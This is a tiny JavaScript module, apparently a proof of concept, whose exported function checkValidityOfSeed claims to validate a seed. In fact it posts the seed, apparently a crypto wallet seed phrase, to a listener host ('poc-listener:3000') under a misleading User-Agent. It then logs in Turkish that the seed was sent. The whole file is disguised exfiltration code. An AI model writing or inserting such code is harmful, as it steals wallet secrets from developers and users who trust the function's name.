async function checkValidityOfSeed(seed) { const res = await fetch("http://poc-listener:3000/xcm", { method: "POST", body: seed, headers: { "Content-Type": "text/plain", "User-Agent": "ad-refferal" } }); console.log(" Seed gönderildi:", seed); } module.exports = { checkValidityOfSeed };